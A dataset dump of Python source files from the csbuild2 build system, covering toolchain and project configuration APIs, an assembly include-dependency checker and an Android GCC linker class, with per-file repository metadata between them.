be used to reference it\n\t\t:type name: str, bytes\n\t\t:param defaultArchitecture: The default architecture to be used for this toolchain\n\t\t:type defaultArchitecture: str, bytes\n\t\t:param tools: List of tools to be used to make the toolchain.\n\t\t:type tools: class\n\t\t:param kwargs: Specify parameter `checkers` to include a dictionary of extension to csbuild.toolchain.CompileChecker instances.\n\t\t\tThese checkers will be used to determine whether or not to recompile files.\n\t\t:type kwargs: any\n\t\t\"\"\"\n\t\tnames = set()\n\t\tfor tool in tools:\n\t\t\tif tool.__name__ in names:\n\t\t\t\tlog.Warn(\n\t\t\t\t\t\"Toolchain {} contains multiple tools with the same class name ('{}'). \"\n\t\t\t\t\t\"All but the first will be inaccessible in macro formatting, which accesses tools by class name.\",\n\t\t\t\t\tname,\n\t\t\t\t\ttool.__name__\n\t\t\t\t )\n\t\t\tnames.add(tool.__name__)\n\t\tshared_globals.allToolchains.add(name)\n\n\t\tif shared_globals.runMode == RunMode.GenerateSolution:\n\t\t\ttools = list(tools)\n\t\t\ttools.extend(list(shared_globals.allGeneratorTools))\n\n\t\tcsbuild.currentPlan.EnterContext((\"toolchain\", (name,)))\n\n\t\ttry:\n\t\t\tcheckers = kwargs.get(\"checkers\", {})\n\t\t\tif checkers:\n\t\t\t\tcsbuild.currentPlan.UpdateDict(\"checkers\", checkers)\n\n\t\t\tcsbuild.currentPlan.SetValue(\"tools\", ordered_set.OrderedSet(tools))\n\t\t\tcsbuild.currentPlan.SetValue(\"_tempToolchain\", toolchain.Toolchain({}, *tools, runInit=False, checkers=checkers))\n\t\t\tcsbuild.currentPlan.defaultArchitectureMap[name] = defaultArchitecture\n\t\tfinally:\n\t\t\tcsbuild.currentPlan.LeaveContext()\n\n\t\tfor tool in tools:\n\t\t\tif tool.supportedArchitectures is not None:\n\t\t\t\tshared_globals.allArchitectures.update(tool.supportedArchitectures)\n\n\t@TypeChecked(name=String, projectTools=list, solutionTool=(_classType, _typeType))\n\tdef RegisterProjectGenerator(name, projectTools, solutionTool):\n\t\t\"\"\"\n\t\tRegister a new project generator to be used for creating solution and project files\n\n\t\t:param name: The name of the generator, which will be used to reference it\n\t\t:type name: str, bytes\n\t\t:param projectTools: List of tools to be used to make individual project files\n\t\t:type projectTools: list[class]\n\t\t:param solutionTool: tool to generate the final solution file\n\t\t:type solutionTool: class\n\t\t\"\"\"\n\n\t\tfor tool in projectTools:\n\t\t\tshared_globals.allGeneratorTools.add(tool)\n\t\tshared_globals.allGenerators[name] = shared_globals.GeneratorData(set(projectTools), solutionTool)\n\n\t\tif shared_globals.runMode == RunMode.GenerateSolution:\n\t\t\tfor tool in projectTools:\n\t\t\t\tsys.modules[\"csbuild\"].Toolchain(*shared_globals.allToolchains).AddTool(tool)\n\n\t@TypeChecked(name=String)\n\tdef RegisterToolchainGroup(name, *toolchains):\n\t\t\"\"\"\n\t\tAdd a toolchain group, a single identifier to serve as an alias for multiple toolchains\n\n\t\t:param name: Name of the group\n\t\t:type name: str\n\t\t:param toolchains: Toolchains to alias\n\t\t:type toolchains: str\n\t\t\"\"\"\n\t\tshared_globals.toolchainGroups[name] = set(toolchains)\n\n\t@TypeChecked(toolchainName=String)\n\tdef SetDefaultToolchain(toolchainName):\n\t\t\"\"\"\n\t\tSet the default toolchain to be used.\n\t\t:param toolchainName: Name of the toolchain\n\t\t:type toolchainName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultToolchain = toolchainName\n
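\n\t# Editorial note: an illustrative registration sketch; MyCompiler and MyLinker are hypothetical tool classes, not part of csbuild:\n\t#\n\t#     csbuild.RegisterToolchain(\"mychain\", \"x64\", MyCompiler, MyLinker)\n\t#     csbuild.RegisterToolchainGroup(\"native\", \"mychain\", \"msvc\")\n\t#     csbuild.SetDefaultToolchain(\"mychain\")\n\n\t@TypeChecked(architectureName=String)\n\tdef SetDefaultArchitecture(architectureName):\n\t\t\"\"\"\n\t\tSet the default 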
architecture to be used.\n\t\t:param architectureName: Name of the architecture\n\t\t:type architectureName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultArchitecture = architectureName\n\n\t@TypeChecked(targetName=String)\n\tdef SetDefaultTarget(targetName):\n\t\t\"\"\"\n\t\tSet the default target to be used.\n\t\t:param targetName: Name of the target\n\t\t:type targetName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultTarget = targetName\n\n\tdef SetSupportedArchitectures(*args):\n\t\t\"\"\"\n\t\tSet the supported architectures for the enclosing scope\n\t\t:param args: Architectures to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\tarchitectures = csbuild.currentPlan.selfLimits[\"architecture\"]\n\t\tif architectures:\n\t\t\tarchitectures.intersection_update(args)\n\t\telse:\n\t\t\tarchitectures.update(args)\n\n\tdef SetSupportedToolchains(*args):\n\t\t\"\"\"\n\t\tSet the supported toolchains for the enclosing scope\n\t\t:param args: Toolchains to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\ttoolchains = csbuild.currentPlan.selfLimits[\"toolchain\"]\n\t\tif toolchains:\n\t\t\ttoolchains.intersection_update(args)\n\t\telse:\n\t\t\ttoolchains.update(args)\n\n\tdef SetSupportedTargets(*args):\n\t\t\"\"\"\n\t\tSet the supported targets for the enclosing scope\n\t\t:param args: Targets to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\ttargets = csbuild.currentPlan.selfLimits[\"target\"]\n\t\tif targets:\n\t\t\ttargets.intersection_update(args)\n\t\telse:\n\t\t\ttargets.update(args)\n\n\tdef SetSupportedPlatforms(*args):\n\t\t\"\"\"\n\t\tSet the supported platforms for the enclosing scope\n\t\t:param args: Platforms to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\tplatforms = csbuild.currentPlan.selfLimits[\"platform\"]\n\t\tif platforms:\n\t\t\tplatforms.intersection_update(args)\n\t\telse:\n\t\t\tplatforms.update(args)\n\n\tdef SetUserData(key, value):\n\t\t\"\"\"\n\t\tAdds miscellaneous data to a project. This can be used later in a build event or in a format string.\n\n\t\tThis becomes an attribute on the project's userData member variable. 
As an example, to set a value:\n\n\t\tcsbuild.SetUserData(\"someData\", \"someValue\")\n\n\t\tThen to access it later:\n\n\t\tproject.userData.someData\n\n\t\t:param key: name of the variable to set\n\t\t:type key: str\n\t\t:param value: value to set to that variable\n\t\t:type value: any\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UpdateDict(\"_userData\", {key : value})\n\n\tdef SetOutputDirectory(outputDirectory):\n\t\t\"\"\"\n\t\tSpecifies the directory in which to place the output file.\n\n\t\t:param outputDirectory: The output directory, relative to the current script location, NOT to the project working directory.\n\t\t:type outputDirectory: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"outputDir\", os.path.abspath(outputDirectory) if outputDirectory else \"\")\n\n\tdef SetIntermediateDirectory(intermediateDirectory):\n\t\t\"\"\"\n\t\tSpecifies the directory in which to place the intermediate files.\n\n\t\t:param intermediateDirectory: The intermediate directory, relative to the current script location, NOT to the project working directory.\n\t\t:type intermediateDirectory: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"intermediateDir\", os.path.abspath(intermediateDirectory) if intermediateDirectory else \"\")\n\n\tdef AddExcludeFiles(*files):\n\t\t\"\"\"\n\t\tManually exclude source files from the build.\n\n\t\t:param files: Files to exclude\n\t\t:type files: str\n\t\t\"\"\"\n\t\tfixedUpFiles = set()\n\t\tfor f in files:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpFiles.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"excludeFiles\", fixedUpFiles)\n\n\tdef AddExcludeDirectories(*dirs):\n\t\t\"\"\"\n\t\tManually exclude source directories from the build.\n\n\t\t:param dirs: Directories to exclude\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tfixedUpDirs = set()\n\t\tfor f in dirs:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpDirs.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"excludeDirs\", fixedUpDirs)\n\n\tdef AddSourceFiles(*files):\n\t\t\"\"\"\n\t\tManually add source files to the build.\n\n\t\t:param files: Files to add\n\t\t:type files: str\n\t\t\"\"\"\n\t\tfixedUpFiles = set()\n\t\tfor f in files:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpFiles.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"sourceFiles\", fixedUpFiles)\n\n\tdef AddSourceDirectories(*dirs):\n\t\t\"\"\"\n\t\tManually add source directories to the build.\n\n\t\t:param dirs: Directories to add\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tfixedUpDirs = set()\n\t\tfor f in dirs:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpDirs.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"sourceDirs\", fixedUpDirs)\n
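\n\t# Editorial note: the Add*/Exclude* helpers above expand glob patterns through glob.glob(), so a makefile could write, for example (paths are illustrative placeholders relative to the makefile):\n\t#\n\t#     csbuild.AddSourceFiles(\"generated/*.cpp\")\n\t#     csbuild.AddExcludeDirectories(\"src/experimental\")\n\n\tclass Scope(ContextManager):\n\t\t\"\"\"\n\t\tEnter a scope. Settings within this scope will be passed on to libraries that include this lib for intermediate,\n\t\tor to applications that include it for final. 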
Anything that depends on this lib will inherit a value set to children,\n\t\tand a value set to all will be applied to this lib as well as inherited by children.\n\n\t\t:param scopeTypes: Scope type to enter\n\t\t:type scopeTypes: ScopeDef\n\t\t\"\"\"\n\t\tdef __init__(self, *scopeTypes):\n\t\t\tallScopes = (\n\t\t\t\tScopeDef.Intermediate,\n\t\t\t\tScopeDef.Final,\n\t\t\t\tScopeDef.Children,\n\t\t\t\tScopeDef.All\n\t\t\t)\n\t\t\tfor scopeType in scopeTypes:\n\t\t\t\tassert scopeType in allScopes, \"Invalid scope type\"\n\t\t\tContextManager.__init__(self, ((\"scope\", scopeTypes),))\n\n\tclass Toolchain(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific toolchain\n\n\t\t:param toolchainNames: Toolchain identifier\n\t\t:type toolchainNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *toolchainNames):\n\t\t\tclass _toolchainMethodResolver(object):\n\t\t\t\tdef __getattribute__(self, item):\n\t\t\t\t\tallToolchains = csbuild.currentPlan.GetTempToolchainsInCurrentContexts(*toolchainNames)\n\t\t\t\t\treturn _getElementFromToolchains(self, allToolchains, item)\n\n\t\t\tContextManager.__init__(self, ((\"toolchain\", toolchainNames),), [_toolchainMethodResolver()])\n\n\tdef ToolchainGroup(*names):\n\t\t\"\"\"\n\t\tApply values to toolchains in a toolchain group\n\t\t:param names: Toolchain group names\n\t\t:type names: str\n\t\t:return: A context manager for the toolchains in the group\n\t\t:rtype: Toolchain\n\t\t\"\"\"\n\t\ttoolchains = set()\n\t\tfor name in names:\n\t\t\ttoolchains |= shared_globals.toolchainGroups[name]\n\t\treturn Toolchain(*toolchains)\n\n\tclass Architecture(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific architecture\n\n\t\t:param architectureNames: Architecture identifier\n\t\t:type architectureNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *architectureNames):\n\t\t\tContextManager.__init__(self, ((\"architecture\", architectureNames),))\n\n\tclass Platform(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific platform\n\n\t\t:param platformNames: Platform identifier\n\t\t:type platformNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *platformNames):\n\t\t\tContextManager.__init__(self, ((\"platform\", platformNames),))\n\n\tclass Target(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific target\n\n\t\t:param targetNames: target identifiers\n\t\t:type targetNames: str, bytes\n\t\t:param kwargs: if addToCurrentScope is set to False as a keyword argument, only projects inside the scope of this\n\t\t\t\t\t target will be made aware of this target's existence; other projects will be excluded\n\t\t\"\"\"\n\t\tdef __init__(self, *targetNames, **kwargs):\n\t\t\tdef _processKwargs(addToCurrentScope=True):\n\t\t\t\tif addToCurrentScope:\n\t\t\t\t\tcsbuild.currentPlan.knownTargets.update(targetNames)\n\t\t\t\t\tcsbuild.currentPlan.childTargets.update(targetNames)\n\n\t\t\t_processKwargs(**kwargs)\n\n\t\t\tself.oldChildTargets = set(csbuild.currentPlan.childTargets)\n\t\t\tself.targetNames = targetNames\n\n\t\t\tshared_globals.allTargets.update(targetNames)\n\n\t\t\tContextManager.__init__(self, ((\"target\", targetNames),))\n\n\t\tdef __enter__(self):\n\t\t\tcsbuild.currentPlan.childTargets.update(object.__getattribute__(self, \"targetNames\"))\n\t\t\tContextManager.__enter__(self)\n\n\t\tdef __exit__(self, exc_type, exc_val, exc_tb):\n\t\t\tcsbuild.currentPlan.childTargets = object.__getattribute__(self, \"oldChildTargets\")\n\t\t\treturn ContextManager.__exit__(self, exc_type, exc_val, exc_tb)\n\n\tclass 
MultiContext(ContextManager):\n\t\t\"\"\"\n\t\tCombine multiple contexts into a single context where the code within it will apply if\n\t\tANY of the supplied contexts are valid\n\n\t\t:param contexts: List of other context manager instances\n\t\t:type contexts: ContextManager\n\t\t\"\"\"\n\t\tdef __init__(self, *contexts):\n\t\t\tcontextsDict = {}\n\t\t\tmethodResolvers = set()\n\n\t\t\tfor contextManager in contexts:\n\t\t\t\tobject.__setattr__(contextManager, \"inself\", True)\n\n\t\t\t\tcontextTuple = contextManager.contexts\n\t\t\t\tfor subTuple in contextTuple:\n\t\t\t\t\tcontextsDict.setdefault(subTuple[0], set()).update(subTuple[1])\n\n\t\t\t\tresolvers = contextManager.resolvers\n\t\t\t\tif resolvers:\n\t\t\t\t\tmethodResolvers.update(resolvers)\n\n\t\t\t\tobject.__setattr__(contextManager, \"inself\", False)\n\n\t\t\tif not methodResolvers:\n\t\t\t\tmethodResolvers = None\n\n\t\t\tContextManager.__init__(self, tuple(contextsDict.items()), methodResolvers)\n\n\tclass Project(object):\n\t\t\"\"\"\n\t\tApply settings to a specific project. If a project does not exist with the given name, it will be created.\n\t\tIf it does exist, these settings will apply to the existing project.\n\n\t\t:param name: The project's name.\n\t\t:type name: str, bytes\n\t\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t\t:type workingDirectory: str, bytes\n\t\t:param depends: List of names of other projects this one depends on.\n\t\t:type depends: list(str, bytes)\n\t\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t\t:type priority: int\n\t\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t\t:type ignoreDependencyOrdering: bool\n\t\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t\t:type autoDiscoverSourceFiles: bool\n\t\t:param autoResolveRpaths: If True, automatically add RPATH arguments to linked shared libraries. Only applies to native, UNIX-based shared libraries and executables.\n\t\t:type autoResolveRpaths: bool\n\t\t\"\"\"\n
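\n\t\t# Editorial note: an illustrative makefile usage sketch; project names and paths are placeholders:\n\t\t#\n\t\t#     with csbuild.Project(\"myApp\", \"src/myApp\", [\"myLib\"]):\n\t\t#         csbuild.SetOutput(\"myApp\", csbuild.ProjectType.Application)\n\n\t\t@TypeChecked(name=String, workingDirectory=String, depends=(list,type(None)), priority=int, ignoreDependencyOrdering=bool, autoDiscoverSourceFiles=bool, autoResolveRpaths=bool)\n\t\tdef __init__(self, name, workingDirectory, depends=None, priority=0, ignoreDependencyOrdering=False, autoDiscoverSourceFiles=True, autoResolveRpaths=True):\n\t\t\tassert name != \"\", \"Project name cannot be empty.\"\n\t\t\tassert workingDirectory != \"\", \"Working directory cannot be empty (use '.' 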
to use the makefile's local directory)\"\n\t\t\tif depends is None:\n\t\t\t\tdepends = []\n\n\t\t\tself._name = name\n\t\t\tself._workingDirectory = os.path.abspath(workingDirectory)\n\t\t\tself._depends = depends\n\t\t\tself._priority = priority\n\t\t\tself._ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\t\tself._autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\t\tself._autoResolveRpaths = autoResolveRpaths\n\t\t\tself._prevPlan = None\n\n\t\tdef __enter__(self):\n\t\t\t\"\"\"\n\t\t\tEnter project context\n\t\t\t\"\"\"\n\t\t\tself._prevPlan = csbuild.currentPlan\n\t\t\tcsbuild.currentPlan = project_plan.ProjectPlan(\n\t\t\t\tself._name,\n\t\t\t\tself._workingDirectory,\n\t\t\t\tself._depends,\n\t\t\t\tself._priority,\n\t\t\t\tself._ignoreDependencyOrdering,\n\t\t\t\tself._autoDiscoverSourceFiles,\n\t\t\t\tself._autoResolveRpaths,\n\t\t\t\tos.getcwd()\n\t\t\t)\n\t\t\tshared_globals.sortedProjects.Add(csbuild.currentPlan, self._depends)\n\n\t\tdef __exit__(self, excType, excValue, backtrace):\n\t\t\t\"\"\"\n\t\t\tLeave the project context\n\n\t\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t\t:type excType: type\n\t\t\t:param excValue: value of thrown exception (ignored)\n\t\t\t:type excValue: any\n\t\t\t:param backtrace: traceback attached to the thrown exception (ignored)\n\t\t\t:type backtrace: traceback\n\t\t\t:return: Always false\n\t\t\t:rtype: bool\n\t\t\t\"\"\"\n\t\t\tcsbuild.currentPlan = self._prevPlan\n\t\t\treturn False\n\n\tdef OnBuildStarted(func):\n\t\t\"\"\"\n\t\tDecorator that registers an OnBuildStarted event hook.\n\t\t:param func: Function that accepts a single parameter with type list[csbuild._build.project.Project],\n\t\t\tcontaining all projects that will be built in this run.\n\t\t:type func: Callable\n\t\t\"\"\"\n\t\tshared_globals.buildStartedHooks.add(func)\n\n\tdef OnBuildFinished(func):\n\t\t\"\"\"\n\t\tDecorator that registers an OnBuildFinished event hook.\n\t\t:param func: function that accepts a single parameter with type list[csbuild._build.project.Project],\n\t\t\tcontaining all projects built in this run\n\t\t:type func: Callable\n\t\t\"\"\"\n\t\tshared_globals.buildFinishedHooks.add(func)\n\n\tdef Run():\n\t\t\"\"\"\n\t\tRun a build. This is called automatically if the environment variable CSBUILD_NO_AUTO_RUN is not equal to 1.\n\t\tIf the build runs automatically, it will execute the csbuild makefile as part of running.\n\t\tIf the build does not run automatically, the csbuild makefile is expected to finish executing before\n\t\tcalling this function. The default and recommended behavior is to allow csbuild to run on its own;\n\t\thowever, it can be beneficial to defer calling Run for use in environments such as tests and the\n\t\tinteractive console.\n\t\t\"\"\"\n\t\tdef _exitsig(sig, _):\n\t\t\tif sig == signal.SIGINT:\n\t\t\t\tlog.Error(\"Keyboard interrupt received. Aborting build.\")\n\t\t\telse:\n\t\t\t\tlog.Error(\"Received terminate signal. 
Aborting build.\")\n\t\t\tsystem.Exit(sig)\n\n\t\tsignal.signal(signal.SIGINT, _exitsig)\n\t\tsignal.signal(signal.SIGTERM, _exitsig)\n\n\t\tshared_globals.runMode = RunMode.Normal\n\n\t\ttry:\n\t\t\t#Regular sys.exit can't be called because we HAVE to re-acquire the import lock at exit.\n\t\t\t#We stored sys.exit earlier, now we overwrite it to call our wrapper.\n\t\t\tsys.exit = system.Exit\n\n\t\t\t_build.Run()\n\t\t\tshared_globals.settings.Persist()\n\t\t\tsystem.Exit(0)\n\t\texcept:\n\t\t\ttraceback.print_exc()\n\t\t\tsystem.CleanUp()\n\t\t\tsys.stdout.flush()\n\t\t\tsys.stderr.flush()\n\t\t\t# pylint: disable=protected-access\n\t\t\tos._exit(1)\n\nif os.getenv(PlatformString(\"CSBUILD_NO_AUTO_RUN\")) != \"1\":\n\tRun()\n" }, { "alpha_fraction": 0.7329045534133911, "alphanum_fraction": 0.7345971465110779, "avg_line_length": 35.92499923706055, "blob_id": "63dc55a353d87dc78f1bcf21bb1dcbc095fcf82d", "content_id": "0c0eeecb9e93bc62daaee34dafe74901498d12be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2954, "license_type": "no_license", "max_line_length": 122, "num_lines": 80, "path": "/csbuild/tools/assemblers/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: assemblers\n\t:synopsis: Built-in assembler tools\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport re\n\nfrom ... 
import log, perf_timer\nfrom ..._utils import shared_globals\nfrom ...toolchain import CompileChecker\n\n_includeRegex = re.compile(R'^\\s*#\\s*include\\s+\"(\\S+)\"', re.M)\n\nclass AsmCompileChecker(CompileChecker):\n\t\"\"\"\n\tCompileChecker for assembly files that knows how to get assembly file dependency lists.\n\t\"\"\"\n\tdef __init__(self, assembler):\n\t\tCompileChecker.__init__(self)\n\t\tself._assembler = assembler\n\n\tdef GetDependencies(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a list of dependencies for a file.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to check\n\t\t:type inputFile: str\n\t\t:return: Set of files to depend on\n\t\t:rtype: set[str]\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"Assembly header dependency resolution\"):\n\t\t\tlog.Info(\"Checking header dependencies for {}\", inputFile)\n\n\t\t\tcache = shared_globals.settings.Get(\"asmHeaderCache\", {})\n\t\t\tmtime = os.path.getmtime(inputFile)\n\t\t\tif inputFile in cache:\n\t\t\t\tif mtime <= cache[inputFile][\"mtime\"]:\n\t\t\t\t\treturn cache[inputFile][\"result\"]\n\n\t\t\twith open(inputFile, \"rb\") as f:\n\t\t\t\tcontents = f.read()\n\t\t\t\tcontents = contents.decode(\"utf-8\", \"replace\")\n\n\t\t\tret = set()\n\n\t\t\tincludeDirs = [os.path.dirname(inputFile)] + list(buildProject.toolchain.Tool(self._assembler).GetIncludeDirectories())\n\t\t\tfor header in _includeRegex.findall(contents):\n\t\t\t\tfor includeDir in includeDirs:\n\t\t\t\t\tmaybeHeaderLoc = os.path.join(includeDir, header)\n\t\t\t\t\tif os.access(maybeHeaderLoc, os.F_OK) and not os.path.isdir(maybeHeaderLoc):\n\t\t\t\t\t\tret.add(os.path.normpath(maybeHeaderLoc))\n\t\t\tcache[inputFile] = {\"mtime\": mtime, \"result\": ret}\n\t\t\treturn ret\n" }, { "alpha_fraction": 0.6989635229110718, "alphanum_fraction": 0.6998648047447205, "avg_line_length": 32.3684196472168, "blob_id": "678fe4cadffd78391465ade12082a25f47f913a3", "content_id": "e6a934fc3429ad74acf1d2cba6f931f003b06c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4438, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/csbuild/tools/linkers/android_gcc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: android_gcc_linker\n\t:synopsis: Android gcc linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .gcc_linker import GccLinker\nfrom ..common.android_tool_base import AndroidToolBase\n\nclass AndroidGccLinker(GccLinker, AndroidToolBase):\n\t\"\"\"\n\tAndroid gcc linker implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\toutputFiles = {\".a\", \".so\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccLinker.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# Android doesn't have a native application type. Applications are linked as shared libraries.\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \".so\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".so\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\tdef _getLdName(self):\n\t\treturn self._androidInfo.ldPath\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn self._androidInfo.gppPath\n\n\tdef _getArchiverName(self):\n\t\treturn self._androidInfo.arPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\"-shared\", \"-fPIC\"]\n\t\tdefaultAndroidArgs = self._getDefaultLinkerArgs()\n\t\treturn baseArgs + defaultAndroidArgs\n\n\tdef _getStdLibArgs(self):\n\t\t# Android handles this manually through library arguments.\n\t\treturn []\n\n\tdef _getLibraryPathArgs(self, project):\n\t\targs = []\n\t\tpaths = set()\n\n\t\t# Add the STL lib path first since it's technically a system path.\n\t\tif self._androidInfo.stlLibPath:\n\t\t\targs.append(\"-L{}\".format(self._androidInfo.stlLibPath))\n\n\t\t# Extract all of the library paths.\n\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\tpaths.add(os.path.dirname(lib))\n\n\t\tfor libPath in sorted(paths):\n\t\t\targs.append(\"-L\\\"{}\\\"\".format(libPath))\n\n\t\treturn args\n\n\tdef _getRpathArgs(self, project):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = [\"-lc\", \"-lm\", \"-lgcc\", \"-llog\", \"-landroid\"]\n\n\t\tif self._androidInfo.stlLibName:\n\t\t\text = \"_static.a\" if self._staticRuntime else \"_shared.so\"\n\t\t\targs.append(\"-l:{}\".format(\"{}{}\".format(self._androidInfo.stlLibName, ext)))\n\n\t\t# Add only the basename for each library.\n\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\targs.append(\"-l:{}\".format(os.path.basename(lib)))\n\n\t\treturn args\n\n\tdef _getArchitectureArgs(self, project):\n\t\tbuildArchName = self._getBuildArchName(project.architectureName)\n\t\treturn [\"-march={}\".format(buildArchName)] if buildArchName else []\n\n\tdef _getSystemArgs(self, project):\n\t\treturn [\n\t\t\t\"--sysroot\",\n\t\t\tself._androidInfo.sysRootPath,\n\t\t\t\"-Wl,--rpath-link={}\".format(self._androidInfo.systemLibPath),\n\t\t]\n\n\tdef 
_getLibrarySearchDirectories(self):\n\t\treturn [self._androidInfo.systemLibPath] + list(self._libraryDirectories)\n" }, { "alpha_fraction": 0.7410473227500916, "alphanum_fraction": 0.74855637550354, "avg_line_length": 35.290836334228516, "blob_id": "557d072da21a3b345cb1dec37f837aa35b721e96", "content_id": "5e2d22e41baffaf572683588909d70c92c22b4ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45545, "license_type": "no_license", "max_line_length": 160, "num_lines": 1255, "path": "/csbuild/tools/project_generators/visual_studio/internal/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED 